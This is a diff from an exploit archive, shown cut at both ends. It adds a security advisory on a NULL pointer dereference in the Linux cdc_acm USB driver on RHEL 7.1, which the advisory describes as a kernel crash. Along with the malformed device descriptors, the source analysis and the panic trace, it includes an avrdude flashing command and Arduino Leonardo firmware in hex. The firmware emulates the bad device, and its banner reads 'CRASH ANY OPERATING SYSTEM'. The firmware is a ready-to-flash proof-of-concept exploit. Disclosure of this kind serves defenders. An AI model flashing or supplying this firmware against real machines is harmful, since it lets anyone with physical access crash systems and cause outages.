+:100590008083E0E9F0E0808181608083E1ECF0E03D +:1005A000808184608083808182608083808181609B +:1005B0008083E3ECF0E0808181608083E0ECF0E018 +:1005C000808182608083E2ECF0E0808181608083C2 +:1005D000EAE7F0E0808184608083808182608083AC +:1005E000808181608083808180688083089590E02D +:1005F000FC013197EE30F10590F5EA5AFF4F0C946B +:10060000AB09809180008F7703C0809180008F7D3F +:1006100080938000089584B58F7702C084B58F7D64 +:1006200084BD0895809190008F7707C080919000DD +:100630008F7D03C080919000877F80939000089504 +:100640008091C0008F7703C08091C0008F7D809320 +:10065000C00008958091C200877F8093C2000895F2 +:10066000CF93DF9390E0FC01EA51FF4F2491FC010E +:10067000EC5FFE4F8491882349F190E0880F991F29 +:10068000FC01E25CFE4FA591B491805D9E4FFC01A0 +:10069000C591D4919FB7611108C0F8948C912095B1 +:1006A00082238C93888182230AC0623051F4F894AB +:1006B0008C91322F309583238C938881822B888371 +:1006C00004C0F8948C91822B8C939FBFDF91CF91C3 +:1006D00008950F931F93CF93DF931F92CDB7DEB78B +:1006E000282F30E0F901E853FF4F8491F901EA51D6 +:1006F000FF4F1491F901EC5FFE4F04910023C9F004 +:10070000882321F069830E94F7026981E02FF0E0DD +:10071000EE0FFF1FE05DFE4FA591B4919FB7F894D7 +:100720008C91611103C01095812301C0812B8C93A2 +:100730009FBF0F90DF91CF911F910F910895CF939D +:10074000DF93282F30E0F901E853FF4F8491F9013E +:10075000EA51FF4FD491F901EC5FFE4FC491CC23D5 +:1007600091F081110E94F702EC2FF0E0EE0FFF1FD5 +:10077000EE5DFE4FA591B4912C912D2381E090E088 +:1007800021F480E002C080E090E0DF91CF910895F5 +:10079000615030F02091F100FC0120830196F8CFE8 +:1007A000289884E680937D0508951092E9001092C0 +:1007B00071051092700590936F0580936E050895F2 +:1007C000FF920F931F93CF93DF93F82E8B01EA01D3 +:1007D000BA01C8010E94A606F80120E030E08EEFC1 +:1007E0002C173D0791F1F7FE02C0A49101C0A08132 +:1007F000609170057091710540916E0550916F0583 +:1008000064177507ACF49091E8009570E1F390914E +:10081000E80092FD1CC0A093F100A0917005B0917A +:1008200071051196AF73BB27AB2B11F48093E800D1 +:10083000A0917005B09171051196B0937105A093C8 +:1008400070052F5F3F4F3196CBCFC90102C08FEFAC +:100850009FEFDF91CF911F910F91FF9008951F920D +:100860000F920FB60F9211246F927F928F929F92E8 +:10087000AF92BF92CF92DF92EF92FF920F931F93AE +:100880002F933F934F935F936F937F938F939F9398 +:10089000AF93BF93EF93FF93CF93DF93CDB7DEB7C3 +:1008A0006297DEBFCDBF1092E9008091E80083FF20 +:1008B00046C168E0CE010A960E94C80382EF809389 +:1008C000E8009A8597FF05C08091E80080FFFCCF83 +:1008D00003C08EEF8093E800892F807609F023C152 +:1008E0008B85811105C01092F1001092F10020C19A +:1008F000282F2D7F213009F41BC1853049F48091C8 +:10090000E80080FFFCCF8C8580688093E30010C1F5 +:10091000863009F0E1C02D8508891989223009F057 +:10092000B3C0EC848E2D90E0209173053091740556 +:10093000821793070CF09FC00E94D5031F92EF927D +:100940008DE394E09F938F930E9483068CE0E89E52 +:1009500070011124E0917505F0917605EE0DFF1DF3 +:1009600089E0DE01119601900D928A95E1F7C801A8 +:100970000E94D50349E050E0BE016F5F7F4F80E0E9 +:100980000E94E0030F900F900F900F90C12CD12C7C +:10099000612C712C33E7A32E34E0B32E4AEA842E67 +:1009A00044E0942EE0917505F0917605EE0DFF1D63 +:1009B000818590E0681679060CF0BAC07F926F923C +:1009C000BF92AF920E948306E0917505F091760583 +:1009D000EE0DFF1D628573856C0D7D1D49E050E0B5 +:1009E00080E00E94E0030F900F900F900F9000E0C6 +:1009F00010E0E0917505F0917605EE0DFF1D028483 +:100A0000F385E02DEC0DFD1D818590E00817190799 +:100A10005CF51F930F939F928F920E948306E09143 +:100A20007505F0917605EE0DFF1D0284F385E02D2E +:100A3000EC0DFD1DC801880F991FA485B585A80F71 +:100A4000B91F4D915C910284F385E02DE80FF91FE9 +:100A50006081718180E00E94E0030F5F1F4F0F9063 +:100A60000F900F900F90C5CF8FEF681A780A8EE025 +:100A7000C80ED11C97CF8FED94E09F938F930E9467 +:100A800083060F900F9058C0C8012A8B0E94D5038F +:100A90002A892130C1F0233009F04EC08C851F9285 +:100AA0008F9389EF94E09F938F930E94830642E097 +:100AB00050E062E871E080E00E94E0030F900F9048 +:100AC0000F900F9035C04091000150E060E071E060 +:100AD00080E00E94E0032CC0873071F1883021F45F +:100AE00081E08093F10024C0893011F5937021F5E5 +:100AF000EDE4F1E081E021E096E38093E9002093CA +:100B0000EB0034913093EC009093ED008F5F3196C1 +:100B1000843099F78EE78093EA001092EA008C8582 +:100B20008093720505C0888999890E94D50304C005 +:100B30008EEF8093E80003C081E28093EB00629621 +:100B40000FB6F894DEBF0FBECDBFDF91CF91FF91FE +:100B5000EF91BF91AF919F918F917F916F915F9135 +:100B60004F913F912F911F910F91FF90EF90DF9048 +:100B7000CF90BF90AF909F908F907F906F900F908D +:100B80000FBE0F901F9018951F920F920FB60F92E5 +:100B900011248F939F938091E1001092E10083FFD5 +:100BA0000FC01092E90091E09093EB001092EC00DE +:100BB00092E39093ED001092720598E09093F0000C +:100BC00082FF1AC080917E05882339F080917E05CE +:100BD000815080937E05882369F080917D0588236C +:100BE00059F080917D05815080937D05811104C06D +:100BF000289A02C05D9AF1CF9F918F910F900FBEFE +:100C00000F901F901895CF93DF93CDB7DEB782E199 +:100C1000FE013596A0E0B1E001900D928A95E1F7D2 +:100C20008F89988D9093760580937505898D9A8D1F +:100C300090937405809373058B8D9C8D90937C05A8 +:100C400080937B058D8D9E8D90937A058093790599 +:100C50008F8D98A1909378058093770510927205F7 +:100C600081E08093D70080EA8093D80082E189BD3B +:100C700009B400FEFDCF61E070E080E090E00E94EA +:100C80007B0280E98093D8008CE08093E200109290 +:100C9000E000559A209ADF91CF91089581E08093EA +:100CA000E00008959091C80095FFFCCF8093CE009E +:100CB00008951092CD0087E68093CC0088E1809360 +:100CC000C9008EE08093CA0008950F931F93CF93BD +:100CD000DF93EC018C01FE0101900020E9F73197D0 +:100CE000EC1BFD0BC8018C1B9D0B8E179F0730F46E +:100CF000F80181918F010E945206EDCFDF91CF91D3 +:100D00001F910F910895CF93DF93CDB7DEB7DA959A +:100D10000FB6F894DEBF0FBECDBFFE01EB5FFE4FF6 +:100D2000419151919F0160E071E0CE0101960E94D6 +:100D30000707CE0101960E946506D3950FB6F89479 +:100D4000DEBF0FBECDBFDF91CF9108958F929F92EE +:100D5000AF92BF92CF92DF92EF92FF920F931F93C9 +:100D6000CF93DF9300D0CDB7DEB75B0122E535E04E +:100D70003F932F9389839A830E9483068981882ECB +:100D80009A81992E0F900F9000E010E08EE5E82EEA +:100D900085E0F82E91E1C92E94E0D92E0A151B05A5 +:100DA000E4F4F40181914F0190E09F938F93FF92BF +:100DB000EF920E9483060F5F1F4FC8018F70992723 +:100DC0000F900F900F900F90892B41F7DF92CF92E9 +:100DD0000E9483060F900F90E1CF81E194E09F93F2 +:100DE0008F930E9483060F900F900F900F90DF91CA +:100DF000CF911F910F91FF90EF90DF90CF90BF9018 +:100E0000AF909F908F900895F8940C94E809AEE00D +:100E1000B0E0EDE0F7E00C94BF098C01CA0146E0B8 +:100E20004C831A83098377FF02C060E070E8615049 +:100E300071097E836D83A901BC01CE0101960E94D8 +:100E400033074D815E8157FD0AC02F8138854217D7 +:100E500053070CF49A01F801E20FF31F10822E964B +:100E6000E4E00C94DB09ACE0B0E0E9E3F7E00C94DB +:100E7000B1097C016B018A01FC0117821682838112 +:100E800081FFBDC1CE0101964C01F7019381F601AE +:100E900093FD859193FF81916F01882309F4ABC184 +:100EA000853239F493FD859193FF81916F018532ED +:100EB00029F4B70190E00E941B09E7CF512C312C97 +:100EC00020E02032A0F48B3269F030F4803259F007 +:100ED000833269F420612CC08D3239F0803339F4CB +:100EE000216026C02260246023C0286021C027FD25 +:100EF00027C030ED380F3A3078F426FF06C0FAE00C +:100F00005F9E300D1124532E13C08AE0389E300DA1 +:100F10001124332E20620CC08E3221F426FD6BC1C9 +:100F2000206406C08C3611F4206802C0883641F473 +:100F3000F60193FD859193FF81916F018111C1CFDE +:100F4000982F9F7D9554933028F40C5F1F4FFFE33B +:100F5000F9830DC0833631F0833771F0833509F0A2 +:100F60005BC022C0F801808189830E5F1F4F44243B +:100F70004394512C540115C03801F2E06F0E711CDE +:100F8000F801A080B18026FF03C0652D70E002C08B +:100F90006FEF7FEFC5012C870E9410092C018301A0 +:100FA0002C852F77222E17C03801F2E06F0E711CAE +:100FB000F801A080B18026FF03C0652D70E002C05B +:100FC0006FEF7FEFC5012C870E9405092C012C854E +:100FD0002068222E830123FC1BC0832D90E048163D +:100FE0005906B0F4B70180E290E00E941B093A94E0 +:100FF000F4CFF50127FC859127FE81915F01B701B0 +:1010000090E00E941B0931103A94F1E04F1A510808 +:101010004114510471F7E5C0843611F0893639F571 +:10102000F80127FF07C060817181828193810C5F85 +:101030001F4F08C060817181882777FD8095982FA8 +:101040000E5F1F4F2F76B22E97FF09C090958095A7 +:10105000709561957F4F8F4F9F4F2068B22E2AE089 +:1010600030E0A4010E944D09A82EA81844C085377D +:1010700029F42F7EB22E2AE030E025C0F22FF97F2E +:10108000BF2E8F36C1F018F4883579F0B4C08037A0 +:1010900019F0883721F0AFC02F2F2061B22EB4FE97 +:1010A0000DC08B2D8460B82E09C024FF0AC09F2F6D +:1010B0009660B92E06C028E030E005C020E130E09F +:1010C00002C020E132E0F801B7FE07C06081718103 +:1010D000828193810C5F1F4F06C06081718180E027 +:1010E00090E00E5F1F4FA4010E944D09A82EA81882 +:1010F000FB2DFF77BF2EB6FE0BC02B2D2E7FA51428 +:1011000050F4B4FE0AC0B2FC08C02B2D2E7E05C0E0 +:101110007A2C2B2D03C07A2C01C0752C24FF0DC016 +:10112000FE01EA0DF11D8081803311F4297E09C092 +:1011300022FF06C07394739404C0822F867809F04E +:10114000739423FD13C020FF06C05A2C731418F4A7 +:10115000530C5718732C731468F4B70180E290E0B5 +:101160002C870E941B0973942C85F5CF731410F4FF +:10117000371801C0312C24FF12C0B70180E390E082 +:101180002C870E941B092C8522FF17C021FF03C05A +:1011900088E590E002C088E790E0B7010CC0822F9C +:1011A000867859F021FD02C080E201C08BE227FD64 +:1011B0008DE2B70190E00E941B09A51438F4B70135 +:1011C00080E390E00E941B095A94F7CFAA94F4019F +:1011D000EA0DF11D8081B70190E00E941B09A1106A +:1011E000F5CF332009F451CEB70180E290E00E94A0 +:1011F0001B093A94F6CFF7018681978102C08FEFE1 +:101200009FEF2C96E2E10C94CD09FC010590615012 +:1012100070400110D8F7809590958E0F9F1F08950C +:10122000FC016150704001900110D8F780959095B5 +:101230008E0F9F1F08950F931F93CF93DF93182F47 +:10124000092FEB018B8181FD03C08FEF9FEF20C041 +:1012500082FF10C04E815F812C813D814217530770 +:101260007CF4E881F9819F012F5F3F4F3983288308 +:10127000108306C0E885F985812F0995892B29F708 +:101280002E813F812F5F3F4F3F832E83812F902FF1 +:10129000DF91CF911F910F910895FA01AA2728306D +:1012A00051F1203181F1E8946F936E7F6E5F7F4F33 +:1012B0008F4F9F4FAF4FB1E03ED0B4E03CD0670FAF +:1012C000781F891F9A1FA11D680F791F8A1F911D02 +:1012D000A11D6A0F711D811D911DA11D20D009F452 +:1012E00068943F912AE0269F11243019305D319394 +:1012F000DEF6CF010895462F4770405D4193B3E07D +:101300000FD0C9F7F6CF462F4F70405D4A3318F023 +:10131000495D31FD4052419302D0A9F7EACFB4E0D4 +:10132000A6959795879577956795BA95C9F700978C +:101330006105710508959B01AC010A2E069457952D +:10134000479537952795BA95C9F7620F731F841F84 +:10135000951FA01D0895EE0FFF1F0590F491E02D3D +:1013600009942F923F924F925F926F927F928F9249 +:101370009F92AF92BF92CF92DF92EF92FF920F9324 +:101380001F93CF93DF93CDB7DEB7CA1BDB0B0FB62E +:10139000F894DEBF0FBECDBF09942A8839884888EB +:1013A0005F846E847D848C849B84AA84B984C88481 +:1013B000DF80EE80FD800C811B81AA81B981CE0F78 +:1013C000D11D0FB6F894DEBF0FBECDBFED0108955D +:0413D000F894FFCFBF +:1013D4001201000200000040AD0BEFBE000101024B +:1013E4000001220342006100640020004200410029 +:1013F40042004500250078002500780025006E0095 +:1014040025007000180342004100440020004300FE +:10141400300046004600450045002100120100024C +:1014240000000040B4040055000101020301090258 +:10143400270001010000FA0705810304040C0705D5 +:10144400010204000C0705820104000C07000700D8 +:101454000700480100500072006F006C00690066CC +:101464000069006300000A550000006BFD180A00C3 +:10147400809F0AB901312B940A8101128946001315 +:10148400000257028B0A5E0AF80A5F01F212010099 +:1014940002010000400D055702000101020301B9D9 +:1014A4000A0100F80A5F0A810A220342006100640B +:1014B400002000420041004200450025007800253C +:1014C40000780025006E00250070001803420041DA +:1014D400004400200043003000460046004500451B +:1014E40000210012010002010000400D0557020016 +:1014F400010102030109040000030100000003F2DA +:101504000AEC0A0902270001010000FA01AB0A09EA +:101514000400000301000000090200202020202014 +:101524005F5F5F5F5F5F5F5F2020202020202020BF +:1015340020202020202020202020202020202020A7 +:1015440020205F5F5F5F5F205F5F20205F2020209F +:101554002020205F5F0A0D00202020202F205F5FC5 +:101564005F5F2F202F5F20205F5F5F5F205F5F5FE3 +:101574005F5F20205F5F5F5F5F20202020202F209F +:101584005F5F5F2F2F202F5F285F295F5F5F5F2FD3 +:10159400202F5F5F0A0D002020202F202F202020E5 +:1015A4002F205F5F205C2F205F5F20602F205F5F14 +:1015B400205C2F205F5F5F2F5F5F5F5F205C5F5F5A +:1015C400205C2F205F5F2F202F205F5F5F2F202F55 +:1015D4002F5F2F0A0D0020202F202F5F5F5F2F2009 +:1015E4002F202F202F202F5F2F202F202F5F2F2001 +:1015F400285F5F2020292F5F5F5F2F205F5F2F20F0 +:101604002F202F5F2F202F202F5F5F2F202C3C0AAD +:101614000D0020205C5F5F5F5F2F5F2F202F5F2F07 +:101624005C5F5F2C5F2F5C5F5F5F5F2F5F5F5F5F5F +:101634002F20202020202F5F5F5F5F2F5C5F5F2FB4 +:101644005F2F5C5F5F5F2F5F2F7C5F7C0A0D002044 +:101654003C3C2043485241534820414E59204F506E +:1016640045524154494E472053595354454D203E09 +:101674003E0A0D00203C3C202863292053657267F4 +:10168400656A20536368756D696C6F20323031353B +:101694002C204F70656E536F7572636520536563BC +:1016A40075726974792052616C66205370656E6E30 +:1016B4006562657267203E3E0A0D000A3E3E205078 +:1016C4007265737320627574746F6E20746F207307 +:1016D4007461727420657865637574696F6E2E2EFB +:1016E4002E0A0D005B44454255475D2045786563ED +:1016F400757465207061796C6F616420300A0D0027 +:10170400526563762D446174613A0A0D005B444569 +:101714004255475D200953656E6420436F6E6669C8 +:101724006775726174696F6E44657363726970740E +:101734006F720928696E6465783A2569292E2E2E00 +:101744000D0A005B44454255475D200953656E64AC +:1017540020496E74657266616365204465736372C3 +:101764006970746F720928696E7465726661636565 +:101774003A2569292E2E2E0D0A005B444542554711 +:101784005D200953656E6420456E64706F696E74E4 +:101794002044657363726970746F720928656E649E +:1017A400706F696E743A2569292E2E2E0D0A005B1E +:1017B40044454255475D203C3C70616E6963206D31 +:1017C4006F64653F3E3E0D0A005B44454255475DEC +:1017D4002009203E3E20537472696E67204465736D +:1017E40063726970746F72207265717565737420A9 +:1017F4002D2073656E64696E67206D616C666F720F +:101804006D656420737472696E67212073657475E5 +:10181400702E7756616C75654C203D3D2025690D11 +:101824000A005B48455844554D505D0A0D0025306B +:041834003258200006 +:00000001FF +-- \ No newline at end of file diff --git a/platforms/linux/dos/39543.txt b/platforms/linux/dos/39543.txt new file mode 100755 index 000000000..a0dd20556 --- /dev/null +++ b/platforms/linux/dos/39543.txt @@ -0,0 +1,624 @@ +OS-S Security Advisory 2016-06 +Linux cdc_acm Nullpointer Dereference + +Date: March 4th, 2016 +Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg +CVE: not yet assigned +CVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C) +Title: Local RedHat Enterprise Linux DoS â?? RHEL 7.1 Kernel crashes on invalid +USB device descriptors (cdc_acm driver) +Severity: Critical. The Kernel panics. A reboot is required. +Ease of Exploitation: Trivial +Vulnerability type: Wrong input validation +Products: RHEL 7.1 including all updates +Kernel-Version: 3.10.0-229.20.1.el7.x86_64 (for debugging-purposes we used the +CentOS Kernel kernel-debuginfo-3.10.0-229.14.1.el7) +Vendor: Red Hat +Vendor contacted: November, 12th 2015 +PDF of Advisory: https://os-s.net/advisories/OSS-2016-06_cdc_acm.pdf + +Abstract: +The Kernel 3.10.0-229.20.1.el7.x86_64 crashes on presentation of a buggy USB +device requiring the cdc_acm driver. + +Detailed product description: +We confirmed the bug on the following system: +RHEL 7.1 +Kernel 3.10.0-229.20.1.el7.x86_64 +Further products or kernel versions have not been tested. +How reproducible: Always +Actual results: Kernel crashes. + +Description: +The bug was found using the USB-fuzzing framework vUSBf from Sergej Schumilo +(github.com/schumilo) using the following device descriptor: + +[*] Device-Descriptor +bLength: 0x12 +bDescriptorType: 0x1 +bcdUSB: 0x200 +bDeviceClass: 0x3 +bDeviceSubClass: 0x0 +bDeviceProtocol: 0x0 +bMaxPacketSize: 0x40 +idVendor: 0x482 +idProduct: 0x203 +bcdDevice: 0x100 +iManufacturer: 0x1 +iProduct: 0x2 +iSerialNumbers: 0x3 +bNumConfigurations: 0x1 + +This is the configuration descriptor containing only one interface descriptor. +The cdc-acm driver assumes that there will be at least two interface- +descriptors with associated endpoint-descriptors. +Since the cdc-acm driver is expecting a second interface descriptor, the +driver tries to dereference a null-pointer. +This results in a crash of the system. + +**** +$ nm cdc-acm.ko.debug | grep acm_probe +0000000000001530 t acm_probe +$ addr2line -e cdc-acm.ko.debug 0x179C +/usr/src/debug/kernel-3.10.0-229.14.1.el7/linux-3.10.0-229.14.1.el7.x86_ +64/drivers/usb/class/cdc- +acm.c:1229 +**** + +**** CentOS-Kernel linux-3.10.0-229.14.1.el7 (drivers/usb/class/cdc-acm.c) +... +1093 /* handle quirks deadly to normal probing*/ +1094 if (quirks == NO_UNION_NORMAL) { +1095 data_interface = usb_ifnum_to_if(usb_dev, 1); /* possible null- +pointer */ +1096 control_interface = usb_ifnum_to_if(usb_dev, 0); +1097 goto skip_normal_probe; +1098 } +... +1226 skip_normal_probe: +1227 +1228 /*workaround for switched interfaces */ +1229 if (data_interface->cur_altsetting->desc.bInterfaceClass /* null- +pointer dereference */ +1230 != CDC_DATA_INTERFACE_TYPE) { +1231 if (control_interface->cur_altsetting->desc.bInterfaceC +... +**** + +[*] Configuration-Descriptor +bLength: 0x9 +bDescriptorType: 0x2 +wTotalLength: 0x27 +bNumInterfaces: 0x1 +bConfigurationValue: 0x1 +iConfiguration: 0x0 +bmAttributes: 0x0 +bMaxPower: 0x31 +[*] Interface-Descriptor +bLength: 0x9 +bDescriptorType: 0x4 +bInterfaceNumber: 0x0 +bAlternateSetting: 0x0 +bNumEndpoints: 0x0 +bInterfaceClass: 0x0 +bInterfaceSubClass: 0x0 +bInterfaceProtocol: 0x0 +[*] Endpoint-Descriptor: +bLength: 0x7 +bDescriptorType: 0x5 +bEndpointAddress: 0x81 +bmAttribut: 0x3 +wMaxPacketSize: 0x404 +bInterval: 0xc +[*] Endpoint-Descriptor: +bLength: 0x7 +bDescriptorType: 0x5 +bEndpointAddress: 0x1 +bmAttribut: 0x2 +wMaxPacketSize: 0x4 +bInterval: 0xc +[*] Endpoint-Descriptor: +bLength: 0x7 +bDescriptorType: 0x5 +bEndpointAddress: 0x82 +bmAttribut: 0x1 +wMaxPacketSize: 0x4 +bInterval: 0xc + +Proof of Concept: +For a proof of concept, we are providing an Arduino Leonardo firmware file. This +firmware will emulate the defective USB device. + +avrdude -v -p ATMEGA32u4 -c avr109 -P /dev/ttyACM0 -b 57600 -U +flash:w:binary.hex + +The firmware has been attached to this bug report. +To prevent the automated delivery of the payload, a jumper may be used to +connect port D3 and 3V3! + +Severity and Ease of Exploitation: +The vulnerability can be easily exploited. Using our Arduino Leonardo firmware, +only physical access to the system is required. + +Vendor Communication: +We contacted Red Hat on the November, 12th 2015. +To this day, no security patch was provided by the vendor. +Since our 90-day Responsible Discourse deadline is expired, we publish this +Security Advisory. + +References: +https://bugzilla.redhat.com/show_bug.cgi?id=1283366 + +Kernel Stacktrace: + +[ 32.550821] usb 1-1: new full-speed USB device number 2 using xhci_hcd +[ 32.765575] usb 1-1: New USB device found, idVendor=0482, idProduct=0203 +[ 32.775042] usb 1-1: New USB device strings: Mfr=1, Product=2, +SerialNumber=3 +[ 32.780788] usb 1-1: Product: Ä? +[ 32.783389] usb 1-1: Manufacturer: Ä? +[ 32.786534] usb 1-1: SerialNumber: % +[ 32.794914] usb 1-1: ep 0x81 - rounding interval to 64 microframes, ep desc +says 96 microframes +[ 32.850587] BUG: unable to handle kernel NULL pointer dereference at +0000000000000008 +[ 32.851028] IP: [] acm_probe+0x26c/0x11d0 [cdc_acm] +[ 32.851028] PGD 0 +[ 32.851028] Oops: 0000 [#1] SMP +[ 32.851028] Modules linked in: cdc_acm(+) ip6t_rpfilter ip6t_REJECT +ipt_REJECT xt_conntrack ebtable_nat ebtable_broute bridge stp llc +ebtable_filter ebtables ip6table_nat nf_conntrack_ipv6 nf_defrag_ipv6 +nf_nat_ipv6 ip6table_mangle ip6table_security ip6table_raw ip6table_filter +ip6_tables iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat +nf_conntrack iptable_mangle iptable_security iptable_raw iptable_filter +ip_tables bochs_drm ppdev syscopyarea sysfillrect sysimgblt ttm drm_kms_helper +drm pcspkr i2c_piix4 i2c_core serio_raw parport_pc parport xfs libcrc32c +sd_mod sr_mod crc_t10dif cdrom crct10dif_common ata_generic pata_acpi ata_piix +libata e1000 floppy dm_mirror dm_region_hash dm_log dm_mod +[ 32.851028] CPU: 0 PID: 2220 Comm: systemd-udevd Not tainted +3.10.0-229.14.1.el7.x86_64 #1 +[ 32.851028] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS +rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014 +[ 32.851028] task: ffff88000bcfa220 ti: ffff88000bd20000 task.ti: ffff88000bd20000 +[ 32.851028] RIP: 0010:[] [] +acm_probe+0x26c/0x11d0 [cdc_acm] +[ 32.851028] RSP: 0018:ffff88000bd23b40 EFLAGS: 00010246 +[ 32.851028] RAX: ffff88000c525800 RBX: 0000000000000000 RCX: ffff88000bd23fd8 +[ 32.851028] RDX: 0000000000000000 RSI: 0000000000000000 RDI: ffff88000c524c00 +[ 32.851028] RBP: ffff88000bd23bd8 R08: 0000000000000001 R09: 0000000000000000 +[ 32.851028] R10: 0000000000002cad R11: ffffffff810020d8 R12: ffff88000c525800 +[ 32.851028] R13: ffff88000f508692 R14: 0000000000000001 R15: ffff88000bcd0000 +[ 32.851028] FS: 00007fb8082b4880(0000) GS:ffff88000fc00000(0000) +knlGS:0000000000000000 +[ 32.851028] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b +[ 32.851028] CR2: 0000000000000008 CR3: 000000000cb87000 CR4: +00000000000006f0 +[ 32.851028] DR0: 0000000000000000 DR1: 0000000000000000 DR2: +0000000000000000 +[ 32.851028] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 +[ 32.851028] Stack: +[ 32.851028] ffff88000bd23ba8 ffff88000d6b3690 ffff88000bd23ba8 00000000436261cb +[ 32.851028] ffff88000bcd0090 0000000000000004 ffff88000bcd0090 +0000000000000202 +[ 32.851028] 0000001000000001 0000000000000200 0000000000000000 +ffff88000bd23bd8 +[ 32.851028] Call Trace: +[ 32.851028] [] usb_probe_interface+0x1c4/0x2f0 +[ 32.851028] [] driver_probe_device+0x87/0x390 +[ 32.851028] [] __driver_attach+0x93/0xa0 +[ 32.851028] [] ? __device_attach+0x40/0x40 +[ 32.851028] [] bus_for_each_dev+0x73/0xc0 +[ 32.851028] [] driver_attach+0x1e/0x20 +[ 32.851028] [] bus_add_driver+0x200/0x2d0 +[ 32.851028] [] driver_register+0x64/0xf0 +[ 32.851028] [] usb_register_driver+0x82/0x160 +[ 32.851028] [] ? 0xffffffffa039cfff +[ 32.851028] [] acm_init+0xba/0x1000 [cdc_acm] +[ 32.851028] [] do_one_initcall+0xb8/0x230 +[ 32.851028] [] load_module+0x133e/0x1b40 +[ 32.851028] [] ? ddebug_proc_write+0xf0/0xf0 +[ 32.851028] [] ? copy_module_from_fd.isra.42+0x53/0x150 +[ 32.851028] [] SyS_finit_module+0xa6/0xd0 +[ 32.851028] [] system_call_fastpath+0x16/0x1b +[ 32.851028] Code: 5f 5d c3 0f 1f 40 00 48 83 7d d0 00 74 d4 44 39 6d c0 74 +0d f6 05 66 4e 00 00 04 0f 85 0f 0e 00 00 48 39 5d d0 0f 84 ea 06 00 00 <48> +8b 43 08 80 78 05 0a 0f 84 fe 00 00 00 48 8b 45 d0 48 8b 40 +[ 32.851028] RIP [] acm_probe+0x26c/0x11d0 [cdc_acm] +[ 32.851028] RSP +[ 32.851028] CR2: 0000000000000008 +[ 33.230701] ---[ end trace b239663354a1c556 ]--- +[ 33.237071] Kernel panic - not syncing: Fatal exception +[ 33.238044] drm_kms_helper: panic occurred, switching back to text console + +Arduino Leonardo Firmware: + +:100000000C94A8000C94C5000C94C5000C94C50079 +:100010000C94C5000C94C5000C94C5000C94C5004C +:100020000C94C5000C94C5000C94C4050C942F04CA +:100030000C94C5000C94C5000C94C5000C94C5002C +:100040000C94C5000C94C5000C94C5000C94C5001C +:100050000C94C5000C94C5000C94C5000C940E02C1 +:100060000C94C5000C94C5000C94C5000C94C500FC +:100070000C94C5000C94C5000C94C5000C94C500EC +:100080000C94C5000C94C5000C94C5000C94C500DC +:100090000C94C5000C94C5000C94C5000C94C500CC +:1000A0000C94C5000C94C5000C94C5000B030E0302 +:1000B000010305032F032F032F03120316031A0353 +:1000C000200324032F032A030000000200080E006F +:1000D00000030401000B000000000000000000000D +:1000E00000000000000004080201104080401020C1 +:1000F00040804080080204018040201002011080EE +:100100001020404004040404040304050202020217 +:1001100004030202020206060606060604040202A0 +:100120000204000000002300260029002C002F00FC +:1001300000000000250028002B002E0031000000E8 +:100140000000240027002A002D00300000C180811B +:1001500011241FBECFEFDAE0DEBFCDBF15E0A0E077 +:10016000B1E0E4EDF3E102C005900D92A436B107D1 +:10017000D9F725E0A4E6B5E001C01D92AF37B2077C +:10018000E1F70E94C8000C9404070C940000089545 +:10019000CF93DF93CDB7DEB7CD59D1090FB6F89421 +:1001A000DEBF0FBECDBF0E94A1020E94C70060E06B +:1001B00083E00E94300361E087E00E94300361E049 +:1001C00088E00E9430030E9459067E012AE9E20E6F +:1001D000F11C84E093E0D70111969C938E9389E003 +:1001E00094E013969C938E93129782E2E2E1F1E001 +:1001F0009E012F5F3F4F6901D90101900D928A95B1 +:10020000E1F788E1E4E3F1E0DE01939601900D92DD +:100210008A95E1F782E1ECE4F1E0DE01DB96019002 +:100220000D928A95E1F789E0EEE5F1E0DE01A05953 +:10023000BF4F01900D928A95E1F72A593F4F99E0FF +:10024000992ED901E92D1D92EA95E9F78E010957FA +:100250001F4F87E0E7E6F1E0D80101900D928A9503 +:10026000E1F7BE0160587F4F87E0EEE6F1E0DB0189 +:1002700001900D928A95E1F7AE0147585F4F87E0F4 +:10028000E5E7F1E0DA0101900D928A95E1F75E0170 +:10029000FEE8AF0EB11C86E0ECE7F1E0D50101907D +:1002A0000D928A95E1F7CE01835B9F4FEEE0DC0172 +:1002B0001D92EA95E9F7E3E0DC011996EC93D90188 +:1002C0009C92F4E01196FC9311971496EC93F9012B +:1002D000DC01292D01900D922A95E1F7FE01EC56E3 +:1002E000FF4FDC011B96FC93EE931A971D96BC9270 +:1002F000AE921C971183008373836283558344837A +:100300000C5211092CE0F80111922A95E9F721E02D +:10031000D80119962C931997FE01E059FF4F0190CF +:100320000D929A94E1F7F8019387828761E088E063 +:100330000E9469038BE492E00E94650688E892E0DF +:100340000E94650687EC92E00E94650686E093E0D5 +:100350000E94650682E493E00E9465068FE793E0C1 +:100360000E94650684EA93E00E9465068BEE93E0A6 +:100370000E94650683E00E949F03892B09F047C015 +:100380005E01F3E2AF0EB11C8824839482E1982EC3 +:1003900084E194E00E946506BF92AF92DF92CF9213 +:1003A000FF92EF921F928F921F930F932DB73EB73C +:1003B000225131090FB6F8943EBF0FBE2DBFADB725 +:1003C000BEB71196FE01FB96892D01900D928A957C +:1003D000E1F78DE695E00E94030668E873E180E0AE +:1003E00090E00E947B028DE695E00E944E0660E060 +:1003F00087E00E94690368E873E180E090E00E9472 +:100400007B020FB6F894DEBF0FBECDBFC1CF6AE04E +:1004100070E080E090E00E947B02ACCF1F920F92D0 +:100420000FB60F9211242F933F938F939F93AF9307 +:10043000BF938091650590916605A0916705B09185 +:1004400068053091640523E0230F2D3720F40196D1 +:10045000A11DB11D05C026E8230F0296A11DB11DE7 +:10046000209364058093650590936605A0936705C6 +:10047000B09368058091690590916A05A0916B051C +:10048000B0916C050196A11DB11D809369059093F3 +:100490006A05A0936B05B0936C05BF91AF919F91D6 +:1004A0008F913F912F910F900FBE0F901F90189535 +:1004B0003FB7F8948091690590916A05A0916B050A +:1004C000B0916C0526B5A89B05C02F3F19F0019689 +:1004D000A11DB11D3FBF6627782F892F9A2F620F6C +:1004E000711D811D911D42E0660F771F881F991FA6 +:1004F0004A95D1F70895CF92DF92EF92FF92CF9372 +:10050000DF936B017C010E945802EB01C114D104FE +:10051000E104F10479F00E9458026C1B7D0B683EE7 +:100520007340A0F381E0C81AD108E108F108C8516E 